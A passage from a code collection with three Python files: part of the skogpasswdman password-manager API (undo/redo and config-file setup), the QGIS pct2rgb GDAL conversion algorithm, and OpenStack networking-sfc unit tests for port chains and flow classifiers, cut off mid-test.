forget = arg[key]
except KeyError:
arg[key] = defaults[key]
# Unicode, usability.
for key in arg:
if key not in ('pb', 'log_vs_raise'):
arg[key] = u(arg[key])
try:
forget = defaults[key]
except KeyError:
raise err_idiot('Unknown keyword argument: {0}'.format(key))
# pb.
if arg['pb'] is None:
arg['pb'] = no_pb()
# Escape some bad characters.
escaped = []
for x in self.pickl(n, pb=arg['pb']):
escaped.append(re.sub(arg['pattern'], arg['replacement'], x))
# Return.
return arg['head'] + arg['sep'].join(escaped) + arg['tail']
def __repr__(self):
return "<skogpasswdmanapi.honeypot object with id {0}>".format(id(self))
def _unredo(passwdobj, honeypotobj, undo_unodable, undo_redoable):
"""_unredo(passwdobj=None, honeypotobj=None,
undo_unodable, undo_redoable)
`passwdobj` and `honeypotobj` are the passwd and honeypot OBJECTS.
Moves '~/.skogpasswdman/passwords' or '~/.skogpasswdman/honeypots' to
`undo_redoable`.
Moves the newest file from `undo_unodable` to
'~/.skogpasswdman/passwords' or '~/.skogpasswdman/honeypots'.
"""
time.sleep(1) # Prevent overwriting historyfiles.
if not isinstance(passwdobj, passwd):
raise err_idiot("Read the fucking __doc__ string")
if not isinstance(honeypotobj, honeypot):
raise err_idiot("Read the fucking __doc__ string")
filename, birth = "", 0
for x in os.listdir(ope(undo_unodable)):
y = os.stat(os.path.join(ope(undo_unodable), x))
if y.st_ctime > birth: # Newer file.
del filename
filename = os.path.join(ope(undo_unodable), x)
# Update filename to the newer file.
birth = y.st_ctime # Increase birth.
del birth
# Filename is now the name of the file.
if "passwords" in filename:
os.rename(ope("~/.skogpasswdman/passwords"),
os.path.join(ope(undo_redoable),
"passwords" + '-' + str(time.time()))) # Copy to redoable.
passwdobj.__del__()
os.rename(filename, ope("~/.skogpasswdman/passwords"))
passwdobj.__init__() # Reload the data structure.
elif "honeypots" in filename:
os.rename(ope("~/.skogpasswdman/honeypots"),
os.path.join(ope(undo_redoable),
"honeypots" + '-' + str(time.time()))) # Copy to redoable.
honeypotobj.__del__()
os.rename(filename, ope("~/.skogpasswdman/honeypots"))
honeypotobj.__init__() # Reload the data structure.
else:
logging.error("function undo in module skogpasswdmanapi:" +
"confused by the file '{0}'".format(filename))
def undo(passwdobj=None, honeypotobj=None):
"""undo(passwdobj=None, honeypotobj=None)
Its arguments are the passwd and honeypot OBJECTS.
Moves '~/.skogpasswdman/passwords' or '~/.skogpasswdman/honeypots' to
'~/.skogpasswdman/redoable/*'.
Moves the newest file from '~/.skogpasswdman/undoable/*' to
'~/.skogpasswdman/passwords' or '~/.skogpasswdman/honeypots'.
"""
_unredo(passwdobj, honeypotobj, "~/.skogpasswdman/undoable",
"~/.skogpasswdman/redoable")
def redo(passwdobj=None, honeypotobj=None):
"""redo(passwdobj=None, honeypotobj=None)
Its arguments are the passwd and honeypot OBJECTS.
Moves '~/.skogpasswdman/passwords' or '~/.skogpasswdman/honeypots' to
'~/.skogpasswdman/undoable/*'.
Moves the newest file from '~/.skogpasswdman/redoable/*' to
'~/.skogpasswdman/passwords' or '~/.skogpasswdman/honeypots'.
"""
_unredo(passwdobj, honeypotobj, "~/.skogpasswdman/redoable",
"~/.skogpasswdman/undoable")
# Run this when imported.
assert __name__ != "__main__"
def ckmkdir(x):
"""ckmkdir(x) - make sure that the directory `x` exists."""
try:
os.stat(ope(x))
except OSError:
os.mkdir(ope(x), 0o700)
def ckmkfile(x, y):
"""ckmkfile(x, y) - make sure that the file `x` exists.
Its default content is `y`.
"""
try:
os.stat(ope(x))
except OSError:
f = open(ope(x), "w")
f.write(y)
f.close()
# Make sure all the needed files exist.
# ckmkdir("~/.skogpasswdman")
try:
os.stat(ope('~/.skogpasswdman'))
except OSError:
try:
os.stat(ope('~/.passwdman')) # Check for old name.
try:
os.symlink(ope('~/.passwdman'), ope('~/.skogpasswdman'))
except OSError as x:
raise Exception('OSError', x) # Oops
except OSError:
os.mkdir(ope('~/.skogpasswdman'), 0o700) # New install.
ckmkdir("~/.skogpasswdman/undoable")
ckmkdir("~/.skogpasswdman/redoable")
ckmkfile("~/.skogpasswdman/passwords", """<?xml version='1.0' encoding='UTF-8'?>
<root file="passwords" magic="skogpasswdman" version="0.1">
</root>
""")
ckmkfile("~/.skogpasswdman/honeypots", """<?xml version='1.0' encoding='UTF-8'?>
<root file="honeypots" magic="skogpasswdman" version="0.1">
</root>
""")
# Simple exclusive lock for all the files.
ckmkfile("~/.skogpasswdman/lock", "")
f = open(ope("~/.skogpasswdman/lock"), 'w')
try:
fcntl.lockf(f, fcntl.LOCK_EX | fcntl.LOCK_NB)
except IOError:
raise err_loaderr('Another skogpasswdman* is running!')
try:
locale.setlocale(locale.LC_ALL, '')
code = locale.getpreferredencoding()
except:
logging.error("Cannot figure out encoding.")
code = 'ascii'
|
radosuav/QGIS | refs/heads/master | python/plugins/processing/algs/gdal/pct2rgb.py | 15 | # -*- coding: utf-8 -*-
"""
***************************************************************************
pct2rgb.py
---------------------
Date : August 2012
Copyright : (C) 2012 by Victor Olaya
Email : volayaf at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Victor Olaya'
__date__ = 'August 2012'
__copyright__ = '(C) 2012, Victor Olaya'
import os
from qgis.PyQt.QtGui import QIcon
from qgis.core import (QgsRasterFileWriter,
QgsProcessingException,
QgsProcessingParameterRasterLayer,
QgsProcessingParameterBand,
QgsProcessingParameterBoolean,
QgsProcessingParameterRasterDestination)
from processing.algs.gdal.GdalAlgorithm import GdalAlgorithm
from processing.tools.system import isWindows
from processing.algs.gdal.GdalUtils import GdalUtils
pluginPath = os.path.split(os.path.split(os.path.dirname(__file__))[0])[0]
class pct2rgb(GdalAlgorithm):
INPUT = 'INPUT'
BAND = 'BAND'
RGBA = 'RGBA'
OUTPUT = 'OUTPUT'
def __init__(self):
super().__init__()
def initAlgorithm(self, config=None):
self.addParameter(QgsProcessingParameterRasterLayer(self.INPUT, self.tr('Input layer')))
self.addParameter(QgsProcessingParameterBand(self.BAND,
self.tr('Band number'),
1,
parentLayerParameterName=self.INPUT))
self.addParameter(QgsProcessingParameterBoolean(self.RGBA,
self.tr('Generate a RGBA file'),
defaultValue=False))
self.addParameter(QgsProcessingParameterRasterDestination(self.OUTPUT, self.tr('PCT to RGB')))
def name(self):
return 'pcttorgb'
def displayName(self):
return self.tr('PCT to RGB')
def group(self):
return self.tr('Raster conversion')
def groupId(self):
return 'rasterconversion'
def icon(self):
return QIcon(os.path.join(pluginPath, 'images', 'gdaltools', '8-to-24-bits.png'))
def commandName(self):
return 'pct2rgb'
def getConsoleCommands(self, parameters, context, feedback, executing=True):
arguments = []
inLayer = self.parameterAsRasterLayer(parameters, self.INPUT, context)
if inLayer is None:
raise QgsProcessingException(self.invalidRasterError(parameters, self.INPUT))
arguments.append(inLayer.source())
out = self.parameterAsOutputLayer(parameters, self.OUTPUT, context)
self.setOutputValue(self.OUTPUT, out)
arguments.append(out)
arguments.append('-of')
arguments.append(QgsRasterFileWriter.driverForExtension(os.path.splitext(out)[1]))
arguments.append('-b')
arguments.append(str(self.parameterAsInt(parameters, self.BAND, context)))
if self.parameterAsBoolean(parameters, self.RGBA, context):
arguments.append('-rgba')
if isWindows():
commands = ["python3", "-m", self.commandName()]
else:
commands = [self.commandName() + '.py']
commands.append(GdalUtils.escapeAndJoin(arguments))
return commands
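# Rough sketch of the console command getConsoleCommands() assembles on a
# non-Windows host for a GeoTIFF output (file names are hypothetical):
#
#     pct2rgb.py input.tif output.tif -of GTiff -b 1 [-rgba]
#
# On Windows the same arguments are handed to "python3 -m pct2rgb" instead.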
|
openstack/networking-sfc | refs/heads/master | networking_sfc/tests/unit/db/test_sfc_db.py | 1 | # Copyright 2017 Futurewei. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import contextlib
import logging
from unittest import mock
from neutron.api import extensions as api_ext
from neutron.common import config
import neutron.extensions as nextensions
from oslo_config import cfg
from oslo_utils import importutils
from oslo_utils import uuidutils
import webob.exc
from networking_sfc.db import flowclassifier_db as fdb
from networking_sfc.db import sfc_db
from networking_sfc import extensions
from networking_sfc.extensions import flowclassifier as fc_ext
from networking_sfc.extensions import servicegraph as sg_ext
from networking_sfc.extensions import sfc
from networking_sfc.extensions import tap as tap_ext
from networking_sfc.tests import base
from networking_sfc.tests.unit.db import test_flowclassifier_db
DB_SFC_PLUGIN_CLASS = (
"networking_sfc.db.sfc_db.SfcDbPlugin"
)
extensions_path = ':'.join(extensions.__path__ + nextensions.__path__)
class SfcDbPluginTestCaseBase(
base.BaseTestCase
):
def _assert_port_chain_equal(self, res_port_chain, expected):
        # List-valued fields (e.g. flow classifiers) are compared ignoring order.
        for k, v in expected.items():
            if isinstance(v, list):
self.assertCountEqual(res_port_chain[k], v)
else:
self.assertEqual(res_port_chain[k], v)
def _create_port_chain(
self, fmt, port_chain=None, expected_res_status=None, **kwargs
):
ctx = kwargs.get('context', None)
tenant_id = kwargs.get('tenant_id', self._tenant_id)
data = {'port_chain': port_chain or {}}
if ctx is None:
data['port_chain'].update({'tenant_id': tenant_id})
req = self.new_create_request(
'port_chains', data, fmt, context=ctx
)
res = req.get_response(self.ext_api)
if expected_res_status:
self.assertEqual(expected_res_status, res.status_int)
return res
@contextlib.contextmanager
def port_chain(self, fmt=None, port_chain=None, do_delete=True, **kwargs):
if not fmt:
fmt = self.fmt
res = self._create_port_chain(fmt, port_chain, **kwargs)
if res.status_int >= 400:
logging.error('create port chain result: %s', res)
raise webob.exc.HTTPClientError(code=res.status_int)
port_chain = self.deserialize(fmt or self.fmt, res)
yield port_chain
if do_delete:
self._delete('port_chains', port_chain['port_chain']['id'])
def _create_port_pair_group(
self, fmt, port_pair_group=None, expected_res_status=None, **kwargs
):
ctx = kwargs.get('context', None)
tenant_id = kwargs.get('tenant_id', self._tenant_id)
data = {'port_pair_group': port_pair_group or {}}
if ctx is None:
data['port_pair_group'].update({'tenant_id': tenant_id})
req = self.new_create_request(
'port_pair_groups', data, fmt, context=ctx
)
res = req.get_response(self.ext_api)
if expected_res_status:
self.assertEqual(expected_res_status, res.status_int)
return res
@contextlib.contextmanager
def port_pair_group(
self, fmt=None, port_pair_group=None, do_delete=True, **kwargs
):
if not fmt:
fmt = self.fmt
res = self._create_port_pair_group(fmt, port_pair_group, **kwargs)
if res.status_int >= 400:
logging.error('create port pair group result: %s', res)
raise webob.exc.HTTPClientError(code=res.status_int)
port_pair_group = self.deserialize(fmt or self.fmt, res)
yield port_pair_group
if do_delete:
self._delete(
'port_pair_groups',
port_pair_group['port_pair_group']['id'])
def _create_port_pair(
self, fmt, port_pair=None, expected_res_status=None, **kwargs
):
ctx = kwargs.get('context', None)
tenant_id = kwargs.get('tenant_id', self._tenant_id)
data = {'port_pair': port_pair or {}}
if ctx is None:
data['port_pair'].update({'tenant_id': tenant_id})
req = self.new_create_request(
'port_pairs', data, fmt, context=ctx
)
res = req.get_response(self.ext_api)
if expected_res_status:
self.assertEqual(expected_res_status, res.status_int)
return res
@contextlib.contextmanager
def port_pair(self, fmt=None, port_pair=None, do_delete=True, **kwargs):
if not fmt:
fmt = self.fmt
res = self._create_port_pair(fmt, port_pair, **kwargs)
if res.status_int >= 400:
logging.error('create port pair result: %s', res)
raise webob.exc.HTTPClientError(code=res.status_int)
port_pair = self.deserialize(fmt or self.fmt, res)
yield port_pair
if do_delete:
self._delete('port_pairs', port_pair['port_pair']['id'])
def _create_service_graph(
self, fmt, service_graph=None, expected_res_status=None, **kwargs
):
ctx = kwargs.get('context', None)
project_id = kwargs.get('project_id', self._tenant_id)
data = {'service_graph': service_graph or {}}
if ctx is None:
data['service_graph'].update({'project_id': project_id})
req = self.new_create_request(
'service_graphs', data, fmt, context=ctx
)
res = req.get_response(self.ext_api)
if expected_res_status:
self.assertEqual(expected_res_status, res.status_int)
return res
@contextlib.contextmanager
def service_graph(self, fmt=None,
service_graph=None, do_delete=True, **kwargs):
if not fmt:
fmt = self.fmt
res = self._create_service_graph(fmt, service_graph, **kwargs)
if res.status_int >= 400:
logging.error('create Service Graph result: %s', res)
raise webob.exc.HTTPClientError(code=res.status_int)
service_graph = self.deserialize(fmt or self.fmt, res)
yield service_graph
if do_delete:
self._delete('service_graphs', service_graph[
'service_graph']['id'])
def _get_expected_port_pair(self, port_pair):
return {
'name': port_pair.get('name') or '',
'description': port_pair.get('description') or '',
'egress': port_pair.get('egress'),
'ingress': port_pair.get('ingress'),
'service_function_parameters': port_pair.get(
'service_function_parameters') or {
'correlation': None, 'weight': 1
}
}
def _test_create_port_pair(self, port_pair, expected_port_pair=None):
if expected_port_pair is None:
expected_port_pair = self._get_expected_port_pair(port_pair)
with self.port_pair(port_pair=port_pair) as pp:
for k, v in expected_port_pair.items():
self.assertEqual(pp['port_pair'][k], v)
def _test_create_port_pairs(
self, port_pairs, expected_port_pairs=None
):
if port_pairs:
port_pair = port_pairs.pop()
if expected_port_pairs:
expected_port_pair = expected_port_pairs.pop()
else:
expected_port_pair = self._get_expected_port_pair(port_pair)
with self.port_pair(port_pair=port_pair) as pp:
for k, v in expected_port_pair.items():
self.assertEqual(pp['port_pair'][k], v)
def _get_expected_port_pair_group(self, port_pair_group):
ret = {
'name': port_pair_group.get('name') or '',
'description': port_pair_group.get('description') or '',
'port_pairs': port_pair_group.get('port_pairs') or [],
'port_pair_group_parameters': port_pair_group.get(
'port_pair_group_parameters'
) or {'lb_fields': [],
'ppg_n_tuple_mapping': {'ingress_n_tuple': {},
'egress_n_tuple': {}}}
}
if port_pair_group.get('group_id'):
ret['group_id'] = port_pair_group['group_id']
return ret
def _test_create_port_pair_group(
self, port_pair_group, expected_port_pair_group=None
):
if expected_port_pair_group is None:
expected_port_pair_group = self._get_expected_port_pair_group(
port_pair_group)
with self.port_pair_group(port_pair_group=port_pair_group) as pg:
for k, v in expected_port_pair_group.items():
self.assertEqual(pg['port_pair_group'][k], v)
def _test_create_port_pair_groups(
self, port_pair_groups, expected_port_pair_groups=None
):
if port_pair_groups:
port_pair_group = port_pair_groups.pop()
if expected_port_pair_groups:
expected_port_pair_group = expected_port_pair_groups.pop()
else:
expected_port_pair_group = self._get_expected_port_pair_group(
port_pair_group)
with self.port_pair_group(port_pair_group=port_pair_group) as pg:
for k, v in expected_port_pair_group.items():
self.assertEqual(pg['port_pair_group'][k], v)
@staticmethod
def _get_expected_port_chain(port_chain):
chain_params = port_chain.get('chain_parameters') or dict()
chain_params.setdefault('correlation', 'mpls')
chain_params.setdefault('symmetric', False)
ret = {
'name': port_chain.get('name') or '',
'description': port_chain.get('description') or '',
'port_pair_groups': port_chain['port_pair_groups'],
'flow_classifiers': port_chain.get('flow_classifiers') or [],
'chain_parameters': chain_params
}
if port_chain.get('chain_id'):
ret['chain_id'] = port_chain['chain_id']
return ret
def _test_create_port_chain(self, port_chain, expected_port_chain=None):
if expected_port_chain is None:
expected_port_chain = self._get_expected_port_chain(port_chain)
with self.port_chain(port_chain=port_chain) as pc:
for k, v in expected_port_chain.items():
self.assertEqual(pc['port_chain'][k], v)
def _test_create_port_chains(
self, port_chains, expected_port_chains=None
):
if port_chains:
port_chain = port_chains.pop()
if expected_port_chains:
expected_port_chain = expected_port_chains.pop()
else:
expected_port_chain = self._get_expected_port_chain(
port_chain)
with self.port_chain(port_chain=port_chain) as pc:
for k, v in expected_port_chain.items():
self.assertEqual(pc['port_chain'][k], v)
@staticmethod
def _get_expected_graph(service_graph):
ret = {
'name': service_graph.get('name') or '',
'description': service_graph.get('description') or '',
'port_chains': service_graph.get('port_chains')
}
return ret
def _test_create_service_graph(self, service_graph, expected_graph=None):
if expected_graph is None:
expected_graph = self._get_expected_graph(service_graph)
with self.service_graph(service_graph=service_graph) as graph:
for k, v in expected_graph.items():
self.assertEqual(graph['service_graph'][k], v)
class SfcDbPluginTestCase(
base.NeutronDbPluginV2TestCase,
test_flowclassifier_db.FlowClassifierDbPluginTestCaseBase,
SfcDbPluginTestCaseBase
):
resource_prefix_map = dict([
(k, sfc.SFC_PREFIX)
for k in sfc.RESOURCE_ATTRIBUTE_MAP.keys()
] + [
(k, fc_ext.FLOW_CLASSIFIER_PREFIX)
for k in fc_ext.RESOURCE_ATTRIBUTE_MAP.keys()
] + [
(k, sg_ext.SG_PREFIX)
for k in sg_ext.RESOURCE_ATTRIBUTE_MAP.keys()
])
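    # The map above ties each SFC, flow-classifier and service-graph resource
    # collection to its API prefix so the generic request helpers build the
    # correct URLs.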
def setUp(self, core_plugin=None, sfc_plugin=None,
flowclassifier_plugin=None, ext_mgr=None):
mock_log_p = mock.patch.object(sfc_db, 'LOG')
self.mock_log = mock_log_p.start()
cfg.CONF.register_opts(sfc.sfc_quota_opts, 'QUOTAS')
if not sfc_plugin:
sfc_plugin = DB_SFC_PLUGIN_CLASS
if not flowclassifier_plugin:
flowclassifier_plugin = (
test_flowclassifier_db.DB_FLOWCLASSIFIER_PLUGIN_CLASS)
service_plugins = {
sfc.SFC_EXT: sfc_plugin,
fc_ext.FLOW_CLASSIFIER_EXT: flowclassifier_plugin
}
sfc_db.SfcDbPlugin.supported_extension_aliases = [
sfc.SFC_EXT, sg_ext.SG_EXT, tap_ext.TAP_EXT]
sfc_db.SfcDbPlugin.path_prefix = sfc.SFC_PREFIX
fdb.FlowClassifierDbPlugin.supported_extension_aliases = [
fc_ext.FLOW_CLASSIFIER_EXT]
fdb.FlowClassifierDbPlugin.path_prefix = (
fc_ext.FLOW_CLASSIFIER_PREFIX
)
super(SfcDbPluginTestCase, self).setUp(
ext_mgr=ext_mgr,
plugin=core_plugin,
service_plugins=service_plugins
)
if not ext_mgr:
self.sfc_plugin = importutils.import_object(sfc_plugin)
self.flowclassifier_plugin = importutils.import_object(
flowclassifier_plugin)
# Note (vks1): Auto-load extensions.
ext_mgr = api_ext.PluginAwareExtensionManager.get_instance()
app = config.load_paste_app('extensions_test_app')
self.ext_api = api_ext.ExtensionMiddleware(app, ext_mgr=ext_mgr)
def test_create_port_chain(self):
with self.port_pair_group(port_pair_group={}) as pg:
self._test_create_port_chain({
'port_pair_groups': [pg['port_pair_group']['id']]})
def test_quota_create_port_chain(self):
cfg.CONF.set_override('quota_port_chain', 3, group='QUOTAS')
with self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg1, self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg2, self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg3, self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg4:
self._create_port_chain(
self.fmt, {
'port_pair_groups': [pg1['port_pair_group']['id']]
}, expected_res_status=201)
self._create_port_chain(
self.fmt, {
'port_pair_groups': [pg2['port_pair_group']['id']]
}, expected_res_status=201)
self._create_port_chain(
self.fmt, {
'port_pair_groups': [pg3['port_pair_group']['id']]
}, expected_res_status=201)
self._create_port_chain(
self.fmt, {
'port_pair_groups': [pg4['port_pair_group']['id']]
}, expected_res_status=409)
def test_create_port_chain_all_fields(self):
with self.port_pair_group(port_pair_group={}) as pg:
self._test_create_port_chain({
'port_pair_groups': [pg['port_pair_group']['id']],
'flow_classifiers': [],
'name': 'abc',
'description': 'def',
'chain_parameters': {'symmetric': False, 'correlation': 'mpls'}
})
def test_create_port_chain_all_fields_with_chain_id(self):
with self.port_pair_group(port_pair_group={}) as pg:
self._test_create_port_chain({
'port_pair_groups': [pg['port_pair_group']['id']],
'flow_classifiers': [],
'name': 'abc',
'description': 'def',
'chain_parameters': {'symmetric': False,
'correlation': 'mpls'},
'chain_id': 99
})
def test_create_port_chain_all_fields_with_symmetric(self):
with self.port_pair_group(port_pair_group={}) as pg:
self._test_create_port_chain({
'port_pair_groups': [pg['port_pair_group']['id']],
'flow_classifiers': [],
'name': 'abc',
'description': 'def',
'chain_parameters': {'symmetric': True, 'correlation': 'mpls'}
})
def test_create_port_chain_multi_port_pair_groups(self):
with self.port_pair_group(
port_pair_group={}
) as pg1, self.port_pair_group(
port_pair_group={}
) as pg2:
self._test_create_port_chain({
'port_pair_groups': [
pg1['port_pair_group']['id'],
pg2['port_pair_group']['id']
]
})
def test_create_port_chain_shared_port_pair_groups(self):
with self.port_pair_group(
port_pair_group={}
) as pg1, self.port_pair_group(
port_pair_group={}
) as pg2, self.port_pair_group(
port_pair_group={}
) as pg3:
self._test_create_port_chains([{
'port_pair_groups': [
pg1['port_pair_group']['id'],
pg2['port_pair_group']['id']
]
}, {
'port_pair_groups': [
pg1['port_pair_group']['id'],
pg3['port_pair_group']['id']
]
}])
def test_create_port_chain_shared_port_pair_groups_different_order(self):
with self.port_pair_group(
port_pair_group={}
) as pg1, self.port_pair_group(
port_pair_group={}
) as pg2:
self._test_create_port_chains([{
'port_pair_groups': [
pg1['port_pair_group']['id'],
pg2['port_pair_group']['id']
]
}, {
'port_pair_groups': [
pg2['port_pair_group']['id'],
pg1['port_pair_group']['id']
]
}])
def test_create_port_chain_with_empty_chain_parameters(self):
with self.port_pair_group(port_pair_group={}) as pg:
self._test_create_port_chain({
'chain_parameters': {},
'port_pair_groups': [pg['port_pair_group']['id']]
})
def test_create_port_chain_with_none_chain_parameters(self):
with self.port_pair_group(port_pair_group={}) as pg:
self._test_create_port_chain({
'chain_parameters': None,
'port_pair_groups': [pg['port_pair_group']['id']]
})
def test_create_port_chain_with_default_chain_parameters(self):
with self.port_pair_group(port_pair_group={}) as pg:
self._test_create_port_chain({
'chain_parameters': {'symmetric': False,
'correlation': 'mpls'},
'port_pair_groups': [pg['port_pair_group']['id']]
})
def test_create_port_chain_with_nsh_correlation(self):
with self.port_pair_group(port_pair_group={}) as pg:
self._test_create_port_chain({
'chain_parameters': {'symmetric': False,
'correlation': 'nsh'},
'port_pair_groups': [pg['port_pair_group']['id']]
})
def test_create_port_chain_with_nsh_correlation_incompatible_ppg_fail(
self):
with self.port(
name='port1',
device_id='default'
) as port1, self.port(
name='port2',
device_id='default'
) as port2:
with self.port_pair(port_pair={
'ingress': port1['port']['id'],
'egress': port1['port']['id'],
'service_function_parameters': {'correlation': 'nsh'}
}) as pp1, self.port_pair(port_pair={
'ingress': port2['port']['id'],
'egress': port2['port']['id'],
'service_function_parameters': {'correlation': 'mpls'}
}) as pp2:
with self.port_pair_group(port_pair_group={
'port_pairs': [
pp1['port_pair']['id']
]
}) as ppg1, self.port_pair_group(port_pair_group={
'port_pairs': [
pp2['port_pair']['id']
]
}) as ppg2:
self._create_port_chain(
self.fmt, {
'chain_parameters': {'symmetric': False,
'correlation': 'nsh'},
'port_pair_groups': [
ppg1['port_pair_group']['id'],
ppg2['port_pair_group']['id']],
}, expected_res_status=400)
def test_create_port_chains_with_conflicting_chain_ids(self):
with self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg1, self.port_pair_group(
port_pair_group={}, do_delete=False
) as pg2:
self._create_port_chain(
self.fmt, {
'port_pair_groups': [pg1['port_pair_group']['id']],
'chain_id': 88
}, expected_res_status=201)
self._create_port_chain(
self.fmt, {
'port_pair_groups': [pg2['port_pair_group']['id']],
'chain_id': 88
}, expected_res_status=400
)
def test_create_port_chain_with_none_flow_classifiers(self):
with self.port_pair_group(port_pair_group={}) as pg:
self._test_create_port_chain({
'flow_classifiers': None,
'port_pair_groups': [pg['port_pair_group']['id']]
})
def test_create_port_chain_with_empty_flow_classifiers(self):
with self.port_pair_group(port_pair_group={}) as pg:
self._test_create_port_chain({
'flow_classifiers': [],
'port_pair_groups': [pg['port_pair_group']['id']]
})
def test_create_port_chain_with_flow_classifiers(self):
with self.port(
name='test1'
) as port:
with self.flow_classifier(flow_classifier={
'logical_source_port': port['port']['id']
}) as fc:
with self.port_pair_group(port_pair_group={}) as pg:
self._test_create_port_chain({
'flow_classifiers': [fc['flow_classifier']['id']],
'port_pair_groups': [pg['port_pair_group']['id']]
})
def test_create_port_chain_with_multi_flow_classifiers(self):
with self.port(
name='test1'
) as port:
with self.flow_classifier(flow_classifier={
'source_ip_prefix': '192.168.100.0/24',
'logical_source_port': port['port']['id']
}) as fc1, self.flow_classifier(flow_classifier={
'source_ip_prefix': '192.168.101.0/24',
'logical_source_port': port['port']['id']
}) as fc2:
with self.port_pair_group(port_pair_group={}) as pg:
self._test_create_port_chain({
'flow_classifiers': [
fc1['flow_classifier']['id'],
fc2['flow_classifier']['id']
],
'port_pair_groups': [pg['port_pair_group']['id']]
})
def test_create_port_chain_with_flow_classifiers_basic_the_same(self):
with self.port(
name='test1'
) as port1, self.port(
name='test2'
) as port2:
with self.flow_classifier(flow_classifier={
'source_ip_prefix': '192.168.100.0/24',
'logical_source_port': port1['port']['id']
}) as fc1, self.flow_classifier(flow_classifier={
'source_ip_prefix': '192.168.100.0/24',
'logical_source_port': port2['port']['id']
}) as fc2:
with self.port_pair_group(port_pair_group={}) as pg:
self._test_create_port_chain({
'flow_classifiers': [
fc1['flow_classifier']['id'],
fc2['flow_classifier']['id']
],
'port_pair_groups': [pg['port_pair_group']['id']]
})
def test_create_multi_port_chain_with_flow_classifiers(self):
with self.port(
name='test1'
) as port:
with self.flow_classifier(flow_classifier={
'source_ip_prefix': '192.168.100.0/24',
'logical_source_port': port['port']['id']
}) as fc1, self.flow_classifier(flow_classifier={
'source_ip_prefix': '192.168.101.0/24',
'logical_source_port': port['port']['id']
}) as fc2:
with self.port_pair_group(
port_pair_group={}
) as pg1, self.port_pair_group(
port_pair_group={}
) as pg2:
with self.port_chain(
port_chain={
'flow_classifiers': [
fc1['flow_classifier']['id']
],
'port_pair_groups': [
pg1['port_pair_group']['id']
]
}
):
self._test_create_port_chain({
'flow_classifiers': [
fc2['flow_classifier']['id']
],
'port_pair_groups': [pg2['port_pair_group']['id']]
})
def test_create_multi_port_chain_with_conflict_flow_classifiers(self):
with self.port(
name='test1'
) as port1, self.port(
name='test2'
) as port2:
with self.flow_classifier(flow_classifier={
'source_ip_prefix': '192.168.100.0/24',
'logical_source_port': port1['port']['id']
}) as fc1, self.flow_classifier(flow_classifier={
'source_ip_prefix': '192.168.100.0/24',
'logical_source_port': port2['port']['id']
}) as fc2:
with self.port_pair_group(
port_pair_group={}
) as pg1, self.port_pair_group(
port_pair_group={}
) as pg2:
with self.port_chain(
port_chain={
'flow_classifiers': [
fc1['flow_classifier']['id']
],
'port_pair_groups': [
pg1['port_pair_group']['id']
]
}
):
self._create_port_chain(
self.fmt, {
'flow_classifiers': [
fc2['flow_classifier']['id']
],
'port_pair_groups': [
pg2['port_pair_group']['id']
]
},
expected_res_status=400
)
def test_create_multi_port_chain_with_same_flow_classifier(self):
with self.port(
name='test1'
) as port1:
with self.flow_classifier(flow_classifier={
'source_ip_prefix': '192.168.100.0/24',
'logical_source_port': port1['port']['id']
}) as fc:
with self.port_pair_group(
port_pair_group={}
) as pg1, self.port_pair_group(
port_pair_group={}
) as pg2:
with self.port_chain(
port_chain={
'flow_classifiers': [
fc['flow_classifier']['id']
],
'port_pair_groups': [
pg1['port_pair_group']['id']
]
}
):
self._create_port_chain(
self.fmt, {
'flow_classifiers': [
fc['flow_classifier']['id']
],
'port_pair_groups': [
pg2['port_pair_group']['id']
]
},
expected_res_status=409
)
def test_create_port_chain_with_port_pairs(self):
with self.port(
name='port1',
device_id='default'
) as src_port, self.port(
name='port2',
device_id='default'
) as dst_port:
with self.port_pair(port_pair={
'ingress': src_port['port']['id'],
'egress': dst_port['port']['id']
}) as pp1, self.port_pair(port_pair={
'ingress': dst_port['port']['id'],
'egress': src_port['port']['id']
}) as pp2:
with self.port_pair_group(port_pair_group={
'port_pairs': [
pp1['port_pair']['id']
]
}) as pg1, self.port_pair_group(port_pair_group={
'port_pairs': [
pp2['port_pair']['id']
]
}) as pg2:
self._test_create_port_chain({
'port_pair_groups': [
pg1['port_pair_group']['id'],
pg2['port_pair_group']['id']
]
})
def test_create_port_chain_with_empty_port_pair_groups(self):
self._create_port_chain(
self.fmt, {'port_pair_groups': []},
expected_res_status=400
)
def test_create_port_chain_with_nonuuid_port_pair_group_id(self):
self._create_port_chain(
self.fmt, {'port_pair_groups': ['unknown']},
expected_res_status=400
)
def test_create_port_chain_with_unknown_port_pair_group_id(self):
self._create_port_chain(
self.fmt, {'port_pair_groups': [uuidutils.generate_uuid()]},
expected_res_status=404
)
def test_create_port_chain_with_same_port_pair_groups(self):
with self.port_pair_group(
port_pair_group={}
) as pg:
with self.port_chain(
port_chain={
'port_pair_groups': [pg['port_pair_group']['id']]
}
):
self._create_port_chain(
self.fmt, {
'port_pair_groups': [pg['port_pair_group']['id']]
}, expected_res_status=409
)
def test_create_port_chain_with_no_port_pair_groups(self):
self._create_port_chain(
self.fmt, {}, expected_res_status=400
)
def test_create_port_chain_with_consecutive_tap_port_pair_groups(self):
with self.port(
name='port1',
device_id='tap_device1'
) as tap_port1, self.port(
name='port2',
device_id='tap_device2'
) as tap_port2:
with self.port_pair(
port_pair={
'ingress': tap_port1['port']['id'],
'egress': tap_port1['port']['id']
}
) as tap_pp1, self.port_pair(
port_pair={
'ingress': tap_port2['port']['id'],
'egress': tap_port2['port']['id']
}
) as tap_pp2:
with self.port_pair_group(
self.fmt,
{
'port_pairs': [tap_pp1['port_pair']['id']],
'tap_enabled': True
}
) as pg1, self.port_pair_group(
self.fmt,
{
'port_pairs': [tap_pp2['port_pair']['id']],
'tap_enabled': True
}
) as pg2:
self._create_port_chain(
self.fmt,
{
'port_pair_groups': [
